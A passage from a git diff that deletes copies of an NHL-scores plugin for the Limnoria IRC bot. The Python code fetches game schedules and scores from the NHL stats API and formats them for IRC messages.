g['linescore']['currentPeriod'], - 'clock': g['linescore'].get('currentPeriodTimeRemaining'), - 'powerplay_h': g['linescore']['teams']['home']['powerPlay'], - 'powerplay_a': g['linescore']['teams']['away']['powerPlay'], - 'goaliePulled_h': g['linescore']['teams']['home']['goaliePulled'], - 'goaliePulled_a': g['linescore']['teams']['away']['goaliePulled'], - 'ended': (g['status']['statusCode'] == '7' or g['status']['statusCode'] == '9'), - 'ppd': (g['status']['statusCode'] == '9'), - 'type': g['gameType'] - } - #print(game_info) - if team == "all": - games.append(game_info) - else: - if team in game_info['home_team'] or team in game_info['away_team']: - games.append(game_info) - else: - pass - return games - -############################ -# Today's games cache -############################ - def _cachedData(self): - return self._today_scores_last_modified_data - - def _haveCachedData(self, url): - return (self._today_scores_cached_url == url) and \ - (self._today_scores_last_modified_time is not None) - - def _cachedDataLastModified(self): - return self._today_scores_last_modified_time - - def _updateCache(self, url, response): - self._today_scores_cached_url = url - self._today_scores_last_modified_time = response.headers['last-modified'] - self._today_scores_last_modified_data = response.read() - -############################ -# Formatting helpers -############################ - def _resultAsString(self, games): - if len(games) == 0: - return "No games found" - else: - s = sorted(games[1:], key=lambda k: k['ended']) #, reverse=True) - #s = [self._gameToString(g) for g in games] - b = [] - for g in s: - b.append(self._gameToString(g)) - #print(b) - #print(' | '.join(b)) - #games_strings = [self._gameToString(g) for g in games] - return ' | '.join(b) - - def _resultTVAsString(self, games): - if len(games) == 0: - return "No games found" - else: - s = sorted(games[1:], key=lambda k: k['ended']) #, reverse=True) - #s = [self._gameToString(g) for g in games] - b = [] - for g in s: - b.append(self._TVToString(g)) - #print(b) - #print(' | '.join(b)) - #games_strings = [self._gameToString(g) for g in games] - return ' | '.join(b) - - def _TVToString(self, game): - """ Given a game, format the information into a string according to the - context. For example: - "MEM @ CLE 07:00 PM ET" (a game that has not started yet), - "HOU 132 GSW 127 F OT2" (a game that ended and went to 2 overtimes), - "POR 36 LAC 42 8:01 Q2" (a game in progress).""" - away_team = game['away_team'] - home_team = game['home_team'] - if game['period'] == 0: # The game hasn't started yet - starting_time = game['starting_time'] \ - if not game['starting_time_TBD'] \ - else "TBD" - starting_time = ircutils.mircColor('PPD', 'red') if game['ppd'] else starting_time - return "{} @ {} {} [{}]".format(away_team, home_team, starting_time, ircutils.bold(game['broadcasts'])) - - # The game started => It has points: - away_score = game['away_score'] - home_score = game['home_score'] - - away_string = "{} {}".format(away_team, away_score) - home_string = "{} {}".format(home_team, home_score) - - # Highlighting 'powerPlay': - if game['powerplay_h'] and game['clock'].upper() != "END" and game['clock'].upper() != "FINAL" and not game['goaliePulled_h']: - home_string = ircutils.mircColor(home_string, 'orange') # 'black', 'yellow') - if game['powerplay_a'] and game['clock'].upper() != "END" and game['clock'].upper() != "FINAL" and not game['goaliePulled_a']: - away_string = ircutils.mircColor(away_string, 'orange') # 'black', 'yellow') - - # Highlighting an empty net (goalie pulled): - if game['goaliePulled_h'] and game['clock'].upper() != "END" and game['clock'].upper() != "FINAL" and game['clock'] != "00:00": - home_string = ircutils.mircColor(home_string, 'red') - if game['goaliePulled_a'] and game['clock'].upper() != "END" and game['clock'].upper() != "FINAL" and game['clock'] != "00:00": - away_string = ircutils.mircColor(away_string, 'red') - - # Bold for the winning team: - if int(away_score) > int(home_score): - away_string = ircutils.bold(away_string) - elif int(home_score) > int(away_score): - home_string = ircutils.bold(home_string) - - #print('got here ', game['broadcasts']) - - base_str = '' - if not game['ended']: - base_str = ' [{}]'.format(game['broadcasts']) - - game_string = "{} {} {}{}".format(away_string, home_string, - self._clockBoardToString(game['clock'], - game['period'], - game['ended'], - game['pregame'], - game['type']), - base_str) - - return game_string - - def _gameToString(self, game): - """ Given a game, format the information into a string according to the - context. For example: - "MEM @ CLE 07:00 PM ET" (a game that has not started yet), - "HOU 132 GSW 127 F OT2" (a game that ended and went to 2 overtimes), - "POR 36 LAC 42 8:01 Q2" (a game in progress).""" - away_team = game['away_team'] - home_team = game['home_team'] - if game['period'] == 0: # The game hasn't started yet - starting_time = game['starting_time'] \ - if not game['starting_time_TBD'] \ - else "TBD" - starting_time = ircutils.mircColor('PPD', 'red') if game['ppd'] else starting_time - return "{} @ {} {}".format(away_team, home_team, starting_time) - - # The game started => It has points: - away_score = game['away_score'] - home_score = game['home_score'] - - away_string = "{} {}".format(away_team, away_score) - home_string = "{} {}".format(home_team, home_score) - - # Highlighting 'powerPlay': - if game['powerplay_h'] and game['clock'].upper() != "END" and game['clock'].upper() != "FINAL" and not game['goaliePulled_h']: - home_string = ircutils.mircColor(home_string, 'orange') # 'black', 'yellow') - if game['powerplay_a'] and game['clock'].upper() != "END" and game['clock'].upper() != "FINAL" and not game['goaliePulled_a']: - away_string = ircutils.mircColor(away_string, 'orange') # 'black', 'yellow') - - # Highlighting an empty net (goalie pulled): - if game['goaliePulled_h'] and game['clock'].upper() != "END" and game['clock'].upper() != "FINAL" and game['clock'] != "00:00": - home_string = ircutils.mircColor(home_string, 'red') - if game['goaliePulled_a'] and game['clock'].upper() != "END" and game['clock'].upper() != "FINAL" and game['clock'] != "00:00": - away_string = ircutils.mircColor(away_string, 'red') - - # Bold for the winning team: - if int(away_score) > int(home_score): - away_string = ircutils.bold(away_string) - elif int(home_score) > int(away_score): - home_string = ircutils.bold(home_string) - - game_string = "{} {} {}".format(away_string, home_string, - self._clockBoardToString(game['clock'], - game['period'], - game['ended'], - game['pregame'], - game['type'])) - - return game_string - - def _clockBoardToString(self, clock, period, game_ended, pregame=None, gType=None): - """Get a string with current period and, if the game is still - in progress, the remaining time in it.""" - period_number = period - # Game hasn't started => There is no clock yet. - if period_number == 0: - return "" - - # Halftime - #if period: - # return ircutils.mircColor('Halftime', 'orange') - - period_string = self._periodToString(period_number, gType) - - # Game finished: - if game_ended or clock.upper() == "FINAL": - if period_number == 3: - return ircutils.mircColor('F', 'red') - else: - return ircutils.mircColor("F/{}".format(period_string), 'red') - - # Game in progress: - if clock.upper() == "END": - return ircutils.mircColor("End {}".format(period_string), 'light blue') - else: - # Period in progress, show clock: - if pregame: - return "{}".format(ircutils.mircColor('Pre-Game', 'green')) - return "{}{}".format(clock + ' ' if clock != '00:00' else "", ircutils.mircColor(period_string, 'green')) - - def _periodToString(self, period, gType): - """Get a string describing the current period in the game. - period is an integer counting periods from 1 (so 5 would be OT1). - The output format is as follows: {Q1...Q4} (regulation); - {OT, OT2, OT3...} (overtimes).""" - if period <= 3: - return "P{}".format(period) - - ot_number = period - 3 - if ot_number == 1: - return "OT" - # if regular/pre season game, we have shootouts - if gType == 'R' or gType == 'PR': - if ot_number > 1: - return "SO" - return "{}OT".format(ot_number) - -############################ -# Date-manipulation helpers -############################ - def _getTodayDate(self): - """Get the current date formatted as "YYYYMMDD". - Because the API separates games by day of start, we will consider and - return the date in the Pacific timezone. - The objective is to avoid reading future games anticipatedly when the - day rolls over at midnight, which would cause us to ignore games - in progress that may have started on the previous day. - Taking the west coast time guarantees that the day will advance only - when the whole continental US is already on that day.""" - today = self._pacificTimeNow().date() - today_iso = today.isoformat() - return today_iso #.replace('-', '') - - def _easternTimeNow(self): - return datetime.datetime.now(pytz.timezone('US/Eastern')) - - def _pacificTimeNow(self): - return datetime.datetime.now(pytz.timezone('US/Pacific')) - - def _convertISODateToTime(self, iso, target='US/Eastern'): - """Convert the ISO date in UTC time that the API outputs into a - time (target timezone) formatted with am/pm. Defaults to US/Eastern.""" - try: - date = pendulum.parse(iso).in_tz('{}'.format(target)) - except: - try: - target = self._checkTarget(target) - date = pendulum.parse(iso).in_tz('{}'.format(target)) - except: - date = pendulum.parse(iso).in_tz('{}'.format('US/Eastern')) - time = date.format('h:mm A zz') - return "{}".format(time) - - def _checkTarget(self, target): - """check input among common tz""" - target = target.upper() - common = {'CT': 'US/Central', - 'CDT': 'US/Central', - 'CST': 'US/Central', - 'MT': 'US/Mountain', - 'MDT': 'US/Mountain', - 'MST': 'US/Mountain', - 'PT': 'US/Pacific', - 'PDT': 'US/Pacific', - 'PST': 'US/Pacific', - 'ET': 'US/Eastern', - 'EDT': 'US/Eastern', - 'EST': 'US/Eastern', - 'CENTRAL': 'US/Central', - 'EASTERN': 'US/Eastern', - 'PACIFIC': 'US/Pacific', - 'MOUNTAIN': 'US/Mountain'} - if target in common: - target = common[target] - - return target - - def _ISODateToEasternTime(self, iso): - """Convert the ISO date in UTC time that the API outputs into an - Eastern time formatted with am/pm. (The default human-readable format - for the listing of games).""" - date = pendulum.parse(iso).in_tz('{}'.format('US/Eastern')) - time = date.format('h:mm A zz') - return "{}".format(time) # Strip the seconds - - def _stripDateSeparators(self, date_string): - return date_string.replace('-', '') - - def _EnglishDateToDate(self, date): - """Convert a human-readable like 'yesterday' to a datetime object - and return a 'YYYYMMDD' string.""" - if date == "lastweek": - day_delta = -7 - elif date == "yesterday": - day_delta = -1 - elif date == "today" or date =="tonight": - day_delta = 0 - elif date == "tomorrow": - day_delta = 1 - elif date == "nextweek": - day_delta = 7 - elif date[:3] == 'sun': - date_string = pendulum.now('US/Pacific').next(pendulum.SUNDAY).format('YYYY-MM-DD') - return date_string - elif date[:3] == 'mon': - date_string = pendulum.now('US/Pacific').next(pendulum.MONDAY).format('YYYY-MM-DD') - return date_string - elif date[:3] == 'tue': - date_string = pendulum.now('US/Pacific').next(pendulum.TUESDAY).format('YYYY-MM-DD') - return date_string - elif date[:3] == 'wed': - date_string = pendulum.now('US/Pacific').next(pendulum.WEDNESDAY).format('YYYY-MM-DD') - return date_string - elif date[:3] == 'thu': - date_string = pendulum.now('US/Pacific').next(pendulum.THURSDAY).format('YYYY-MM-DD') - return date_string - elif date[:3] == 'fri': - date_string = pendulum.now('US/Pacific').next(pendulum.FRIDAY).format('YYYY-MM-DD') - return date_string - elif date[:3] == 'sat': - date_string = pendulum.now('US/Pacific').next(pendulum.SATURDAY).format('YYYY-MM-DD') - return date_string - # Calculate the day difference and return a string - date_string = (self._pacificTimeNow() + - datetime.timedelta(days=day_delta)).strftime('%Y-%m-%d') - return date_string - - def _checkDateInput(self, date): - """Verify that the given string is a valid date formatted as - YYYY-MM-DD. Also, the API seems to go back until 2014-10-04, so we - will check that the input is not a date earlier than that.""" - - error_string = 'Incorrect date format, should be YYYY-MM-DD' - - if date is None: - return None - - if date in self._FUZZY_DAYS: - date = self._EnglishDateToDate(date) - elif date[:3].lower() in self._FUZZY_DAYS: - date = self._EnglishDateToDate(date.lower()) -# elif date[:3].upper() in self._TEAMS_BY_TRI: -# date = date[:3].upper() -# return date - - #try: - # date = dateutil.parser.parse(date) - #except: - # raise ValueError('Incorrect date format, should be YYYY-MM-DD') - - #print(date) - - if date.isdigit(): - try: - date = datetime.datetime.strptime(date, '%Y%m%d').strftime('%Y-%m-%d') - except: - raise ValueError('Incorrect date format, should be YYYY-MM-DD') - elif date.replace('-','').isdigit(): - try: - parsed_date = datetime.datetime.strptime(date, '%Y-%m-%d') - except: - raise ValueError('Incorrect date format, should be YYYY-MM-DD') - elif date.replace('/','').isdigit(): - if len(date.split('/')) == 2: - year = '/' + str(datetime.datetime.now().year) - date += year - elif len(date.split('/')) == 3: - if len(date.split('/')[2]) == 2: - date = '{}/{}/{}'.format(date.split('/')[0], date.split('/')[1], '20{}'.format(date.split('/')[2])) - else: - raise ValueError('Incorrect date format, should be YYYY-MM-DD') - try: - date = datetime.datetime.strptime(date, '%m/%d/%Y').strftime('%Y-%m-%d') - except: - raise ValueError('Incorrect date format, should be YYYY-MM-DD') - elif '-' not in date and date.isdigit() == False and len(date) > 3: - if date.title() in ['Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday']: - return "Incorrect date format, should be YYYY-MM-DD" - try: - date = date.title() - year = str(datetime.datetime.now().year) - date += year - try: - date = datetime.datetime.strptime(date, '%d%b%Y').strftime('%Y-%m-%d') - except: - date = datetime.datetime.strptime(date, '%b%d%Y').strftime('%Y-%m-%d') - except: - raise ValueError('Incorrect date format, should be YYYY-MM-DD') - #return "Incorrect date format, should be YYYY-MM-DD" - else: - return None - - return date - -Class = NHL - -# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79: diff --git a/v1/data/codefile/oddluck@limnoria-plugins__33c7a3f__NHL$plugin.py.target.py b/v1/data/codefile/oddluck@limnoria-plugins__33c7a3f__NHL$plugin.py.target.py deleted file mode 100644 index 25f1733..0000000 --- a/v1/data/codefile/oddluck@limnoria-plugins__33c7a3f__NHL$plugin.py.target.py +++ /dev/null @@ -1,746 +0,0 @@ -### -# Copyright (c) 2016, Santiago Gil -# Copyright (c) 2020, oddluck -# -# This program is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program. If not, see . -### - -import supybot.utils as utils -from supybot.commands import * -import supybot.plugins as plugins -import supybot.ircutils as ircutils -import supybot.callbacks as callbacks -import json -import urllib.request -import pendulum -import requests - -try: - from supybot.i18n import PluginInternationalization - _ = PluginInternationalization('NHL') -except ImportError: - # Placeholder that allows to run the plugin on a bot - # without the i18n module - _ = lambda x: x - -class NHL(callbacks.Plugin): - """Get scores from NHL.com.""" - def __init__(self, irc): - self.__parent = super(NHL, self) - self.__parent.__init__(irc) - - self._SCOREBOARD_ENDPOINT = ("https://statsapi.web.nhl.com/api/v1/schedule?startDate={}&endDate={}" + - "&expand=schedule.teams,schedule.linescore,schedule.broadcasts.all,schedule.ticket,schedule.game.content.media.epg" + - "&leaderCategories=&site=en_nhl&teamId=") - # https://statsapi.web.nhl.com/api/v1/schedule?startDate=2016-12-15&endDate=2016-12-15 - # &expand=schedule.teams,schedule.linescore,schedule.broadcasts,schedule.ticket,schedule.game.content.media.epg - # &leaderCategories=&site=en_nhl&teamId= - - self._FUZZY_DAYS = ['yesterday', 'tonight', 'today', 'tomorrow', - 'sun', 'mon', 'tue', 'wed', 'thu', 'fri', 'sat'] - - # These two variables store the latest data acquired from the server - # and its modification time. It's a one-element cache. - # They are used to employ HTTP's 'If-Modified-Since' header and - # avoid unnecessary downloads for today's information (which will be - # requested all the time to update the scores). - self._today_scores_cached_url = None - self._today_scores_last_modified_time = None - self._today_scores_last_modified_data = None - - self._TEAMS_BY_TRI = self._getTeams() - - #pendulum.set_formatter('alternative') - - def nhl(self, irc, msg, args, optional_team, optional_date): - """[] [] - Get games for a given date (YYYY-MM-DD). If none is specified, return games - scheduled for today. Optionally add team abbreviation to filter - for a specific team.""" - - # Check to see if there's optional input and if there is check if it's - # a date or a team, or both. - tz = None - if optional_team is None: - team = "all" - if optional_date: - if '--tz' in optional_date: - tz = optional_date.split()[2] - optional_date = optional_date.split()[0] - try: - date = self._checkDateInput(optional_date) - #print("1") - except ValueError as e: - irc.reply('ERROR: {0!s}'.format(e)) - return - else: - if optional_team == '--tz': - tz = optional_date - team = 'all' - date = None - else: - date = self._checkDateInput(optional_team) - #print("2") - if date: # and len(date) != 3: - team = "all" -# elif date and len(date) == 3: -# team = date -# date = None - else: - team = optional_team.upper() - try: - date = self._checkDateInput(optional_date) - #print("3") - except ValueError as e: - irc.reply('ERROR: {0!s}'.format(e)) - return - - if date is None: - if not tz: - tz = 'US/Eastern' - games = self._getTodayGames(team, tz) - games_string = self._resultAsString(games) - if not games_string: - irc.reply("No games found for {}".format(team)) - return - try: - tdate = pendulum.from_format(games[0], 'YYYY-MM-DD').strftime('%m/%d/%y') - games_string_date = ircutils.bold(tdate + ': ') - except: - games_string_date = '' - #print(games[1]['clock'], games[1]['ended']) - if len(games) == 2: - if not games[1]['ended']: - broadcasts = games[1]['broadcasts'] - games_string += ' [{}]'.format(broadcasts) - #print(games) - irc.reply(games_string_date + games_string) - else: - games = self._getGamesForDate(team, date) - games_string = self._resultAsString(games) - #print(games_string) - if games_string == '': - irc.reply("No games found for {}".format(team)) - return - try: - tdate = pendulum.from_format(games[0], 'YYYY-MM-DD').strftime('%m/%d/%y') - games_string_date = ircutils.bold(tdate + ': ') - except: - games_string_date = '' - if len(games) == 1: - if not games[1]['ended']: - try: - broadcasts = games[1]['broadcasts'] - games_string += ' [{}]'.format(broadcasts) - except: - pass - #irc.reply(games_string) - irc.reply(games_string_date + games_string) - - nhl = wrap(nhl, [optional('somethingWithoutSpaces'), optional('somethingWithoutSpaces')]) - - def _getTeams(self): - - url = 'https://statsapi.web.nhl.com/api/v1/teams' - try: - data = requests.get(url).json() - data = data['teams'] - except: - return None - - teams = [] - for team in data: - teams.append(team['abbreviation']) - return teams - - def nhltv(self, irc, msg, args, optional_team, optional_date): - """[] [] - Get television broadcasts for a given date (YYYY-MM-DD). If none is specified, return broadcasts - scheduled for today. Optionally add team abbreviation to filter - for a specific team.""" - - # Check to see if there's optional input and if there is check if it's - # a date or a team, or both. - if optional_team is None: - team = "all" - try: - date = self._checkDateInput(optional_date) - except ValueError as e: - irc.reply('ERROR: {0!s}'.format(e)) - return - else: - date = self._checkDateInput(optional_team) - if date: - team = "all" - else: - team = optional_team.upper() - try: - date = self._checkDateInput(optional_date) - except ValueError as e: - irc.reply('ERROR: {0!s}'.format(e)) - return - - if date is None: - games = self._getTodayTV(team) - games_string = self._resultTVAsString(games) - try: - tdate = pendulum.from_format(games[0], 'YYYY-MM-DD').strftime('%m/%d/%y') - games_string_date = ircutils.bold(tdate + ': ') - except: - games_string_date = '' - #print(games[0]['clock'], games[0]['ended']) - if len(games) == 1: - if not games[1]['ended']: - broadcasts = games[1]['broadcasts'] - games_string += ' [{}]'.format(broadcasts) - irc.reply(games_string_date + games_string) - else: - games = self._getTVForDate(team, date) - if isinstance(games, str): - irc.reply(games) - return - games_string = self._resultTVAsString(games) - try: - tdate = pendulum.from_format(games[0], 'YYYY-MM-DD').strftime('%m/%d/%y') - games_string_date = ircutils.bold(tdate + ': ') - except: - games_string_date = '' - if len(games) == 1: - if not games[1]['ended']: - try: - broadcasts = games[1]['broadcasts'] - games_string += ' [{}]'.format(broadcasts) - except: - pass - #irc.reply(games_string) - irc.reply(games_string_date + games_string) - - #if date is None: - # irc.reply(self._getTodayTV(team)) - #else: - # irc.reply(self._getTVForDate(team, date)) - - nhltv = wrap(nhltv, [optional('somethingWithoutSpaces'), optional('somethingWithoutSpaces')]) - - def _getTodayGames(self, team, tz='US/Eastern'): - games = self._getGames(team, self._getTodayDate(), tz) - return games - - def _getGamesForDate(self, team, date): - #print(date) - games = self._getGames(team, date) - return games - - def _getTodayTV(self, team): - games = self._getGames(team, self._getTodayDate()) - return games - - def _getTVForDate(self, team, date): - #print(date) - games = self._getGames(team, date) - return games - -############################ -# Content-getting helpers -############################ - def _getGames(self, team, date, tz='US/Eastern'): - """Given a date, populate the url with it and try to download its - content. If successful, parse the JSON data and extract the relevant - fields for each game. Returns a list of games.""" - url = self._getEndpointURL(date) - - # (If asking for today's results, enable the 'If-Mod.-Since' flag) - use_cache = (date == self._getTodayDate()) - #use_cache = False - response = self._getURL(url, use_cache) - if isinstance(response, str): - return "ERROR: Something went wrong, check input" - - json = self._extractJSON(response) - games = self._parseGames(json, team, tz) - return games - - def _getEndpointURL(self, date): - return self._SCOREBOARD_ENDPOINT.format(date, date) - - def _getURL(self, url, use_cache=False): - """Use urllib to download the URL's content. The use_cache flag enables - the use of the one-element cache, which will be reserved for today's - games URL. (In the future we could implement a real cache with TTLs).""" - user_agent = 'Mozilla/5.0 \ - (X11; Ubuntu; Linux x86_64; rv:45.0) \ - Gecko/20100101 Firefox/45.0' - header = {'User-Agent': user_agent} - response = None - - # ('If-Modified-Since' to avoid unnecessary downloads.) - if use_cache and self._haveCachedData(url): - header['If-Modified-Since'] = self._today_scores_last_modified_time - - request = urllib.request.Request(url, headers=header) - #print(url) - - try: - response = urllib.request.urlopen(request) - except urllib.error.HTTPError as error: - if use_cache and error.code == 304: # Cache hit - self.log.info("{} - 304" - "(Last-Modified: " - "{})".format(url, self._cachedDataLastModified())) - return self._cachedData() - else: - self.log.error("HTTP Error ({}): {}".format(url, error.code)) - pass - - self.log.info("{} - 200".format(url)) - - if not response: - return "ERROR: Something went wrong, check input" - - if not use_cache: - return response.read() - - # Updating the cached data: - self._updateCache(url, response) - return self._cachedData() - - def _extractJSON(self, body): - return json.loads(body.decode('utf-8')) - - def _parseGames(self, json, team, tz='US/Eastern'): - """Extract all relevant fields from NHL.com's json - and return a list of games.""" - games = [] - if json['totalGames'] == 0: - return games - games.append(json['dates'][0]['date']) - for g in json['dates'][0]['games']: - #print(g) - # Starting times are in UTC. By default, we will show Eastern times. - # (In the future we could add a user option to select timezones.) - tbd_check = self._ISODateToEasternTime(g['gameDate']) - #print(tbd_check) - if '3:00 AM' in tbd_check: - starting_time = 'TBD' - #starting_time_TBD = True - else: - if 'US/Eastern' not in tz: - starting_time = self._convertISODateToTime(g['gameDate'], tz) - else: - starting_time = self._ISODateToEasternTime(g['gameDate']) - broadcasts = [] - try: - for item in g['broadcasts']: - broadcasts.append(item['name']) - except: - pass - #print(broadcasts) - game_info = {'home_team': g['teams']['home']['team']['abbreviation'], - 'away_team': g['teams']['away']['team']['abbreviation'], - 'home_score': g['teams']['home']['score'], - 'away_score': g['teams']['away']['score'], - 'broadcasts': '{}'.format(', '.join(item for item in broadcasts)), - 'starting_time': starting_time, - 'starting_time_TBD': g['status']['startTimeTBD'], - 'pregame': (True if 'Pre-Game' in g['status']['detailedState'] else False), - 'period': g['linescore']['currentPeriod'], - 'clock': g['linescore'].get('currentPeriodTimeRemaining'), - 'powerplay_h': g['linescore']['teams']['home']['powerPlay'], - 'powerplay_a': g['linescore']['teams']['away']['powerPlay'], - 'goaliePulled_h': g['linescore']['teams']['home']['goaliePulled'], - 'goaliePulled_a': g['linescore']['teams']['away']['goaliePulled'], - 'ended': (g['status']['statusCode'] == '7' or g['status']['statusCode'] == '9'), - 'ppd': (g['status']['statusCode'] == '9'), - 'type': g['gameType'] - } - #print(game_info) - if team == "all": - games.append(game_info) - else: - if team in game_info['home_team'] or team in game_info['away_team']: - games.append(game_info) - else: - pass - return games - -############################ -# Today's games cache -############################ - def _cachedData(self): - return self._today_scores_last_modified_data - - def _haveCachedData(self, url): - return (self._today_scores_cached_url == url) and \ - (self._today_scores_last_modified_time is not None) - - def _cachedDataLastModified(self): - return self._today_scores_last_modified_time - - def _updateCache(self, url, response): - self._today_scores_cached_url = url - self._today_scores_last_modified_time = response.headers['last-modified'] - self._today_scores_last_modified_data = response.read() - -############################ -# Formatting helpers -############################ - def _resultAsString(self, games): - if len(games) == 0: - return "No games found" - else: - s = sorted(games[1:], key=lambda k: k['ended']) #, reverse=True) - #s = [self._gameToString(g) for g in games] - b = [] - for g in s: - b.append(self._gameToString(g)) - #print(b) - #print(' | '.join(b)) - #games_strings = [self._gameToString(g) for g in games] - return ' | '.join(b) - - def _resultTVAsString(self, games): - if len(games) == 0: - return "No games found" - else: - s = sorted(games[1:], key=lambda k: k['ended']) #, reverse=True) - #s = [self._gameToString(g) for g in games] - b = [] - for g in s: - b.append(self._TVToString(g)) - #print(b) - #print(' | '.join(b)) - #games_strings = [self._gameToString(g) for g in games] - return ' | '.join(b) - - def _TVToString(self, game): - """ Given a game, format the information into a string according to the - context. For example: - "MEM @ CLE 07:00 PM ET" (a game that has not started yet), - "HOU 132 GSW 127 F OT2" (a game that ended and went to 2 overtimes), - "POR 36 LAC 42 8:01 Q2" (a game in progress).""" - away_team = game['away_team'] - home_team = game['home_team'] - if game['period'] == 0: # The game hasn't started yet - starting_time = game['starting_time'] \ - if not game['starting_time_TBD'] \ - else "TBD" - starting_time = ircutils.mircColor('PPD', 'red') if game['ppd'] else starting_time - return "{} @ {} {} [{}]".format(away_team, home_team, starting_time, ircutils.bold(game['broadcasts'])) - - # The game started => It has points: - away_score = game['away_score'] - home_score = game['home_score'] - - away_string = "{} {}".format(away_team, away_score) - home_string = "{} {}".format(home_team, home_score) - - # Highlighting 'powerPlay': - if game['powerplay_h'] and game['clock'].upper() != "END" and game['clock'].upper() != "FINAL" and not game['goaliePulled_h']: - home_string = ircutils.mircColor(home_string, 'orange') # 'black', 'yellow') - if game['powerplay_a'] and game['clock'].upper() != "END" and game['clock'].upper() != "FINAL" and not game['goaliePulled_a']: - away_string = ircutils.mircColor(away_string, 'orange') # 'black', 'yellow') - - # Highlighting an empty net (goalie pulled): - if game['goaliePulled_h'] and game['clock'].upper() != "END" and game['clock'].upper() != "FINAL" and game['clock'] != "00:00": - home_string = ircutils.mircColor(home_string, 'red') - if game['goaliePulled_a'] and game['clock'].upper() != "END" and game['clock'].upper() != "FINAL" and game['clock'] != "00:00": - away_string = ircutils.mircColor(away_string, 'red') - - # Bold for the winning team: - if int(away_score) > int(home_score): - away_string = ircutils.bold(away_string) - elif int(home_score) > int(away_score): - home_string = ircutils.bold(home_string) - - #print('got here ', game['broadcasts']) - - base_str = '' - if not game['ended']: - base_str = ' [{}]'.format(game['broadcasts']) - - game_string = "{} {} {}{}".format(away_string, home_string, - self._clockBoardToString(game['clock'], - game['period'], - game['ended'], - game['pregame'], - game['type']), - base_str) - - return game_string - - def _gameToString(self, game): - """ Given a game, format the information into a string according to the - context. For example: - "MEM @ CLE 07:00 PM ET" (a game that has not started yet), - "HOU 132 GSW 127 F OT2" (a game that ended and went to 2 overtimes), - "POR 36 LAC 42 8:01 Q2" (a game in progress).""" - away_team = game['away_team'] - home_team = game['home_team'] - if game['period'] == 0: # The game hasn't started yet - starting_time = game['starting_time'] \ - if not game['starting_time_TBD'] \ - else "TBD" - starting_time = ircutils.mircColor('PPD', 'red') if game['ppd'] else starting_time - return "{} @ {} {}".format(away_team, home_team, starting_time) - - # The game started => It has points: - away_score = game['away_score'] - home_score = game['home_score'] - - away_string = "{} {}".format(away_team, away_score) - home_string = "{} {}".format(home_team, home_score) - - # Highlighting 'powerPlay': - if game['powerplay_h'] and game['clock'].upper() != "END" and game['clock'].upper() != "FINAL" and not game['goaliePulled_h']: - home_string = ircutils.mircColor(home_string, 'orange') # 'black', 'yellow') - if game['powerplay_a'] and game['clock'].upper() != "END" and game['clock'].upper() != "FINAL" and not game['goaliePulled_a']: - away_string = ircutils.mircColor(away_string, 'orange') # 'black', 'yellow') - - # Highlighting an empty net (goalie pulled): - if game['goaliePulled_h'] and game['clock'].upper() != "END" and game['clock'].upper() != "FINAL" and game['clock'] != "00:00": - home_string = ircutils.mircColor(home_string, 'red') - if game['goaliePulled_a'] and game['clock'].upper() != "END" and game['clock'].upper() != "FINAL" and game['clock'] != "00:00": - away_string = ircutils.mircColor(away_string, 'red') - - # Bold for the winning team: - if int(away_score) > int(home_score): - away_string = ircutils.bold(away_string) - elif int(home_score) > int(away_score): - home_string = ircutils.bold(home_string) - - game_string = "{} {} {}".format(away_string, home_string, - self._clockBoardToString(game['clock'], - game['period'], - game['ended'], - game['pregame'], - game['type'])) - - return game_string - - def _clockBoardToString(self, clock, period, game_ended, pregame=None, gType=None): - """Get a string with current period and, if the game is still - in progress, the remaining time in it.""" - period_number = period - # Game hasn't started => There is no clock yet. - if period_number == 0: - return "" - - # Halftime - #if period: - # return ircutils.mircColor('Halftime', 'orange') - - period_string = self._periodToString(period_number, gType) - - # Game finished: - if game_ended or clock.upper() == "FINAL": - if period_number == 3: - return ircutils.mircColor('F', 'red') - else: - return ircutils.mircColor("F/{}".format(period_string), 'red') - - # Game in progress: - if clock.upper() == "END": - return ircutils.mircColor("End {}".format(period_string), 'light blue') - else: - # Period in progress, show clock: - if pregame: - return "{}".format(ircutils.mircColor('Pre-Game', 'green')) - return "{}{}".format(clock + ' ' if clock != '00:00' else "", ircutils.mircColor(period_string, 'green')) - - def _periodToString(self, period, gType): - """Get a string describing the current period in the game. - period is an integer counting periods from 1 (so 5 would be OT1). - The output format is as follows: {Q1...Q4} (regulation); - {OT, OT2, OT3...} (overtimes).""" - if period <= 3: - return "P{}".format(period) - - ot_number = period - 3 - if ot_number == 1: - return "OT" - # if regular/pre season game, we have shootouts - if gType == 'R' or gType == 'PR': - if ot_number > 1: - return "SO" - return "{}OT".format(ot_number) - -############################ -# Date-manipulation helpers -############################ - def _getTodayDate(self): - """Get the current date formatted as "YYYYMMDD". - Because the API separates games by day of start, we will consider and - return the date in the Pacific timezone. - The objective is to avoid reading future games anticipatedly when the - day rolls over at midnight, which would cause us to ignore games - in progress that may have started on the previous day. - Taking the west coast time guarantees that the day will advance only - when the whole continental US is already on that day.""" - today = self._pacificTimeNow().date() - today_iso = today.isoformat() - return today_iso #.replace('-', '') - - def _easternTimeNow(self): - return pendulum.now('US/Eastern') - - def _pacificTimeNow(self): - return pendulum.now('US/Pacific') - - def _convertISODateToTime(self, iso, target='US/Eastern'): - """Convert the ISO date in UTC time that the API outputs into a - time (target timezone) formatted with am/pm. Defaults to US/Eastern.""" - try: - date = pendulum.parse(iso).in_tz('{}'.format(target)) - except: - try: - target = self._checkTarget(target) - date = pendulum.parse(iso).in_tz('{}'.format(target)) - except: - date = pendulum.parse(iso).in_tz('{}'.format('US/Eastern')) - time = date.format('h:mm A zz') - return "{}".format(time) - - def _checkTarget(self, target): - """check input among common tz""" - target = target.upper() - common = {'CT': 'US/Central', - 'CDT': 'US/Central', - 'CST': 'US/Central', - 'MT': 'US/Mountain', - 'MDT': 'US/Mountain', - 'MST': 'US/Mountain', - 'PT': 'US/Pacific', - 'PDT': 'US/Pacific', - 'PST': 'US/Pacific', - 'ET': 'US/Eastern', - 'EDT': 'US/Eastern', - 'EST': 'US/Eastern', - 'CENTRAL': 'US/Central', - 'EASTERN': 'US/Eastern', - 'PACIFIC': 'US/Pacific', - 